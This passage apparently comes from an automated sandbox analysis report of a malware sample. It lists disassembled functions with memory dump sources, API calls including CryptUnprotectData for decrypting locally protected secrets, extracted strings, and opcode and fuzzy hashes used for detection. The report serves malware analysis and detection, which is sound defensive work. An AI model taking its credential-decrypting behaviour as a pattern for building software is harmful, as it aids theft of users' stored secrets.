                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ~s$ +;o$6JZ
                                    • API String ID: 0-4200540766
                                    • Opcode ID: fb04a0f107c84327b3e4b7c4999fa67d54627e265938e305ed42c6134ffaceca
                                    • Instruction ID: 8283fa4746cf3d73047f5548f8f8ecad982be1970fed52620db531d3f791762b
                                    • Opcode Fuzzy Hash: fb04a0f107c84327b3e4b7c4999fa67d54627e265938e305ed42c6134ffaceca
                                    • Instruction Fuzzy Hash: 9F4238F360C204AFE3046E2DEC8567BBBE9EF98720F1A493DE6C4D3744E97558018696
                                    Function 00093720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(0009E118,00000000,00000001,0009E108,00000000), ref: 00093758
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 000937B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: dec08a625e8e14bd2e47dec7c1cf3db2151d580d1fd73563f541861959016511
                                    • Instruction ID: 230e48421756c09bdc13ee2ea01724d8b59b44dde0308d52388d823122923a38
                                    • Opcode Fuzzy Hash: dec08a625e8e14bd2e47dec7c1cf3db2151d580d1fd73563f541861959016511
                                    • Instruction Fuzzy Hash: DB41F770A00A28AFDB24DB58CC99F9BB7B4BB48702F4041D9E608EB290D7716E85CF50
                                    Function 00089B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00089B84
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00089BA3
                                    • LocalFree.KERNEL32(?), ref: 00089BD3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: ba4bf3870d31db20cdaf6212d9014d7613d7ceb9060ef120a9cb6ba0e06b528c
                                    • Instruction ID: 4c789bd576edd47d429ae074f4e2edc2e5997c8090405b94ae8a95450a04800b
                                    • Opcode Fuzzy Hash: ba4bf3870d31db20cdaf6212d9014d7613d7ceb9060ef120a9cb6ba0e06b528c
                                    • Instruction Fuzzy Hash: 6611A8B4A00209DFDB04DFA4D989EAE77B5FB88304F104558E91597350D774AE10CBA1
                                    Function 00449CFB Relevance: 2.9, Strings: 1, Instructions: 1623COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'f/
                                    • API String ID: 0-129831727
                                    • Opcode ID: 09b24a2503248853ef87423460e1c2b54273d54d29293a84604ede4cc89ffe02
                                    • Instruction ID: 5f85f748e71590a4198543a97579733b73ec601cc8355374edf16c1a42c042d7
                                    • Opcode Fuzzy Hash: 09b24a2503248853ef87423460e1c2b54273d54d29293a84604ede4cc89ffe02
                                    • Instruction Fuzzy Hash: 7BB22BF3A0C204AFE704AE2DEC8577ABBE9EB94320F16453DEAC4C3744E93558158697
                                    Function 0045957D Relevance: 2.2, Strings: 1, Instructions: 950COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Y!}
                                    • API String ID: 0-1495517983
                                    • Opcode ID: 38cc195ace011716ce3f4ddcb24f6300a8a6bb5930552daf220efb8df081d1a8
                                    • Instruction ID: 281d0be4ab5ac0afe525990387e9e9a7526bda31fa1dfd58079c47b4f3808043
                                    • Opcode Fuzzy Hash: 38cc195ace011716ce3f4ddcb24f6300a8a6bb5930552daf220efb8df081d1a8
                                    • Instruction Fuzzy Hash: E852F6F360C2009FE304AE2DEC8577ABBE5EF94620F1A853DEAC4C3744E63599058697
                                    Function 0042E240 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !y{n
                                    • API String ID: 0-69970170
                                    • Opcode ID: 874926a40bc695dd0dafebd87a51881a4744054cadd4c14b6da697486660263e
                                    • Instruction ID: 52bea15aeeb1b0e4750eab6eac15e8685fe0d56d66fd3315479c821e88714771
                                    • Opcode Fuzzy Hash: 874926a40bc695dd0dafebd87a51881a4744054cadd4c14b6da697486660263e
                                    • Instruction Fuzzy Hash: 1A6128F3B082006FF3086969EC59B7B77D6DBD4320F16463DEB8AC3780E87558058296
                                    Function 00443330 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: anc~
                                    • API String ID: 0-435866895
                                    • Opcode ID: 1f13f18fc4aabbf3847c5532115a953c9c82549d83bed42085b246f80f7d854e
                                    • Instruction ID: 3858fd35b48e791749f87fcc4c84f82c67e4284aa16fcb196d0abf4bb0342174
                                    • Opcode Fuzzy Hash: 1f13f18fc4aabbf3847c5532115a953c9c82549d83bed42085b246f80f7d854e
                                    • Instruction Fuzzy Hash: 065136B3A182149FE304BF2DEC85BBAB7D4EF94710F0A493DEAC4C3740E97499048696
                                    Function 0038BF62 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: t4m
                                    • API String ID: 0-1470551393
                                    • Opcode ID: 15f9df6ab923aa0415e64fae402c1eb0792091f003504472e86df6d98e6a2281
                                    • Instruction ID: 78c5590eb286d5617dfa0f5923d19a23224d9f60d067bda8f5bb82e7f7f37962
                                    • Opcode Fuzzy Hash: 15f9df6ab923aa0415e64fae402c1eb0792091f003504472e86df6d98e6a2281
                                    • Instruction Fuzzy Hash: 64519FF39087149FE3107E19EC8576AFBE9EB94320F1B492DDAC883340EA7558448797
                                    Function 003FE546 Relevance: .2, Instructions: 212COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7c31e7e14ee40f2bc265a11a4067a0773529b107535d59cd427307e2ea184409
                                    • Instruction ID: dacd750cc887fad6802b9a25b3c2dcff418ee9a6a3c792dbdb2d8d2720f402b4
                                    • Opcode Fuzzy Hash: 7c31e7e14ee40f2bc265a11a4067a0773529b107535d59cd427307e2ea184409
                                    • Instruction Fuzzy Hash: B65126F3E086184FE3046A3DDC88336BA99DB94320F2B873DDE98977C4E97919448281
                                    Function 003ED698 Relevance: .2, Instructions: 201COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2989e8bd46d6a0a736c81c589b828d947bfb7a7d2e5ba83ca2a25822237e2867
                                    • Instruction ID: c8484433e9938ccb66e67bc6397bdc97bc9c08919cd15b6158c3f6e2dc9f3e26
                                    • Opcode Fuzzy Hash: 2989e8bd46d6a0a736c81c589b828d947bfb7a7d2e5ba83ca2a25822237e2867
                                    • Instruction Fuzzy Hash: 4C5145B26083089FE308BE2DEC8577AF7D5DB90710F0A853CDAC487744FA35A9158687
                                    Function 004273C4 Relevance: .2, Instructions: 200COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 763c4e15c1690abfdbb798089345c1704b90078a1f19ac4805925b0307e0ba1b
                                    • Instruction ID: 258711f4fe6444757cc02c9235391e0ead947fce26558c66adcb855934484fcb
                                    • Opcode Fuzzy Hash: 763c4e15c1690abfdbb798089345c1704b90078a1f19ac4805925b0307e0ba1b
                                    • Instruction Fuzzy Hash: 955114F3A087149FE3046E29ECC566ABBD9EFD4760F2B863DE6D497340D53948018782
                                    Function 0033512E Relevance: .2, Instructions: 184COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62a5843d9c34820c897cf532d0a037371490d7953527180a91869ad6d61a2abd
                                    • Instruction ID: 071fb9c24a8b04990dc219a8e240f8fd2df28bf6010536393c004643a26e46f0
                                    • Opcode Fuzzy Hash: 62a5843d9c34820c897cf532d0a037371490d7953527180a91869ad6d61a2abd
                                    • Instruction Fuzzy Hash: EE51B1F3E085105FF3046A29EC4577BB7D6EBD4320F1A463DEAD893780E9399C058696
                                    Function 0039F792 Relevance: .2, Instructions: 172COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
